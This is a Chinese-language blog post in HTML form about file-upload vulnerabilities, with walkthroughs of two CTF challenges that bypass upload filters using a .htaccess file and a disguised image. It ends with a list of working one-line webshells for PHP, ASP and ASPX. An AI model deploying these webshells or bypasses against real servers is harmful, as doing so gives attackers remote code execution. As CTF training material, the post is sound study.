

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="一：介绍1. 文件上传漏洞的概述文件上传漏洞通常出现在基于Web的应用程序中，允许用户上传文件。如果服务器端的代码没有正确验证或限制上传的文件类型、大小、内容等，攻击者就可以利用这一漏洞上传恶意文件。例如：  PHP木马：攻击者可以上传一个PHP脚本文件，该文件包含恶意代码，当服务器执行这个文件时，攻击者可以控制服务器。 Webshell：一种用于远程控制服务器的工具，通过上传Webshell，攻">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传">
<meta property="og:url" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一：介绍1. 文件上传漏洞的概述文件上传漏洞通常出现在基于Web的应用程序中，允许用户上传文件。如果服务器端的代码没有正确验证或限制上传的文件类型、大小、内容等，攻击者就可以利用这一漏洞上传恶意文件。例如：  PHP木马：攻击者可以上传一个PHP脚本文件，该文件包含恶意代码，当服务器执行这个文件时，攻击者可以控制服务器。 Webshell：一种用于远程控制服务器的工具，通过上传Webshell，攻">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126214858346.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215007220.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215053575.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215648388.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215806119.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126220622866.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126221322956.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126221510409.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126221826260.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126222232057.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126222357384.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126223830692.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126223940390.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126224236462.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126224515503.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126224607658.png">
<meta property="og:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126225053720.png">
<meta property="article:published_time" content="2025-01-26T13:27:33.000Z">
<meta property="article:modified_time" content="2025-01-26T14:51:08.221Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126214858346.png">
  
  
  
  <title>文件上传 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"ikjKolerJpSmjccl0uGubLmP-gzGzoHsz","app_key":"hniq2BU5toWagAog937vGbby","server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>。</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/%E5%9B%BE%E7%89%87.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="文件上传"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-01-26 21:27" pubdate>
          2025年1月26日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          803 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          7 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">文件上传</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="一：介绍"><a href="#一：介绍" class="headerlink" title="一：介绍"></a>一：介绍</h2><h3 id="1-文件上传漏洞的概述"><a href="#1-文件上传漏洞的概述" class="headerlink" title="1. 文件上传漏洞的概述"></a>1. 文件上传漏洞的概述</h3><p><strong>文件上传漏洞</strong>通常出现在基于Web的应用程序中，允许用户上传文件。如果服务器端的代码没有正确验证或限制上传的文件类型、大小、内容等，攻击者就可以利用这一漏洞上传恶意文件。例如：</p>
<ul>
<li><strong>PHP木马</strong>：攻击者可以上传一个PHP脚本文件，该文件包含恶意代码，当服务器执行这个文件时，攻击者可以控制服务器。</li>
<li><strong>Webshell</strong>：一种用于远程控制服务器的工具，通过上传Webshell，攻击者可以执行任意命令。</li>
</ul>
<h3 id="2-常见的文件上传漏洞场景"><a href="#2-常见的文件上传漏洞场景" class="headerlink" title="2. 常见的文件上传漏洞场景"></a>2. 常见的文件上传漏洞场景</h3><ul>
<li><strong>未限制文件类型</strong>：攻击者可以上传非预期的文件类型，如<code>.php</code>、<code>.asp</code>等。</li>
<li><strong>未限制文件大小</strong>：攻击者可以上传大文件，消耗服务器资源。</li>
<li><strong>不安全的文件名处理</strong>：如果服务器直接使用上传的文件名，而没有进行适当的处理或过滤，可能导致路径遍历攻击。</li>
<li><strong>不验证文件内容</strong>：直接将上传的文件保存到服务器，未进行任何形式的检查或消毒处理。</li>
</ul>
<h2 id="二：题目"><a href="#二：题目" class="headerlink" title="二：题目"></a>二：题目</h2><h3 id="题目1-GXYCTF-2019-BabyUpload"><a href="#题目1-GXYCTF-2019-BabyUpload" class="headerlink" title="题目1 [GXYCTF 2019]BabyUpload"></a>题目1 [GXYCTF 2019]BabyUpload</h3><p>先打开靶机，显示的是一下界面</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126214858346.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126214858346">

<p>先上传一个jpg试试</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215007220.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126215007220">

<p>提示太露骨了</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215053575.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126215053575">

<p>一句话木马改成.jpg类型上传</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215648388.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126215648388">

<p>改成.php类型</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126215806119.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126215806119">

<p>然后试试其他类型的一句话木马，用.jpg上传</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126220622866.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126220622866">

<p>发现上传成功，接下来只需要能够解析.jpg文件中的php代码就OK了。</p>
<p>解析.jpg文件中的php代码，我们可以使用.htaccess文件来进行实现。</p>
<p>在上传.htaccess时要利用Burpsuite进行抓包，修改 Content-type为image&#x2F;jpeg然后放行</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126221322956.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126221322956">

<p>就会显示.htaccess上传成功，然后再上传那个其他类型的一句话木马</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126221510409.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126221510409">

<p>显示那个一句话木马也上传成功了，然后用蚁剑连接，先测试一下，发现连接成功</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126221826260.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126221826260">

<p>在根目录下找到flag</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126222232057.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126222232057">

<p>点进去，就拿到flag了</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126222357384.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126222357384">

<h3 id="题目2-SWPUCTF-2022-新生赛-Ez-upload"><a href="#题目2-SWPUCTF-2022-新生赛-Ez-upload" class="headerlink" title="题目2 [SWPUCTF 2022 新生赛]Ez_upload"></a>题目2 [SWPUCTF 2022 新生赛]Ez_upload</h3><p>修改过的一句话木马用.jpg上传，发现上传成功，但是蚁剑连接不上</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126223830692.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126223830692">

<p>可以试试.php行不行</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126223940390.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126223940390">

<p>后缀名不能有ph！ ，与上一题一样还要传入一个.htaccess用Burpsuite进行抓包，修改 Content-type为image&#x2F;jpeg然后放行<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126224236462.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126224236462"></p>
<p>上传成功，再上传一次一句话木马，用蚁剑连接<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126224515503.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126224515503"></p>
<p>根目录下有flag，但是打开里面是空的</p>
<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126224607658.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126224607658">

<p>可以用post请求访问phpinfo()页面  post传参  cmd&#x3D;phpinfo();<img src="/2025/01/26/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/image-20250126225053720.png" srcset="/img/loading.gif" lazyload class="" title="image-20250126225053720"></p>
<p>ctrl+f输入flag，快速定位flag</p>
<h2 id="三：常见的一句话木马"><a href="#三：常见的一句话木马" class="headerlink" title="三：常见的一句话木马"></a>三：常见的一句话木马</h2><p><strong>常见的一句话木马</strong>‌包括以下几种形式：‌1</p>
<ol>
<li>‌**<a target="_blank" rel="noopener" href="http://www.baidu.com/s?tn=34046034_10_dg&wd=PHP&usm=5&ie=utf-8&rsv_pq=a1cb4fe400014b36&oq=%E5%B8%B8%E8%A7%81%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC&rsv_t=7844Gjgg4F1PE+0N/RdtYEDK6vwQZp+sHeI1nnAFqMzjfqgWSTMV7xugXr40/eVa7SVzhv4&rsv_dl=re_dqa_generate&sa=re_dqa_generate">PHP</a>木马**‌：<ul>
<li><code>&lt;?php @eval($_POST[&#39;cmd&#39;]); ?&gt;</code>：这是最简单的一句话木马，通过POST请求执行代码。</li>
<li><code>&lt;?php @eval($_GET[&#39;cmd&#39;]); ?&gt;</code>：通过GET请求执行代码。</li>
<li><code>&lt;?php assert($_POST[&#39;cmd&#39;]); ?&gt;</code>：使用assert函数执行代码。</li>
</ul>
</li>
<li>‌**<a target="_blank" rel="noopener" href="http://www.baidu.com/s?tn=34046034_10_dg&wd=ASP&usm=5&ie=utf-8&rsv_pq=a1cb4fe400014b36&oq=%E5%B8%B8%E8%A7%81%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC&rsv_t=d2e2w3EckCuTGE0HFq+pTEVFEnY3SbCXkf+nNBcPZGi8n+Z4msdXmfVW2LvJW38EpNsFnB0&rsv_dl=re_dqa_generate&sa=re_dqa_generate">ASP</a>木马**‌：<ul>
<li><code>&lt;% execute(request(&quot;value&quot;)) %&gt;</code>：通过request对象执行代码。</li>
</ul>
</li>
<li>‌**<a target="_blank" rel="noopener" href="http://www.baidu.com/s?tn=34046034_10_dg&wd=ASPX&usm=5&ie=utf-8&rsv_pq=a1cb4fe400014b36&oq=%E5%B8%B8%E8%A7%81%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC&rsv_t=15f21KD/93aSaIlfYtCZ5sIDE4O7jt1I/gntaavGYyZhZSsMSClYvPltU3Cg4Wsp9uWHdZ8&rsv_dl=re_dqa_generate&sa=re_dqa_generate">ASPX</a>木马**‌：<ul>
<li><code>&lt;%@ Page Language=&quot;Jscript&quot; %&gt; &lt;% eval(Request.Item[&quot;pass&quot;], &quot;unsafe&quot;); %&gt;</code>：使用Jscript语言执行代码。</li>
</ul>
</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>文件上传</div>
      <div>http://example.com/2025/01/26/文件上传/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年1月26日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/25/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="文件包含">
                        <span class="hidden-mobile">文件包含</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
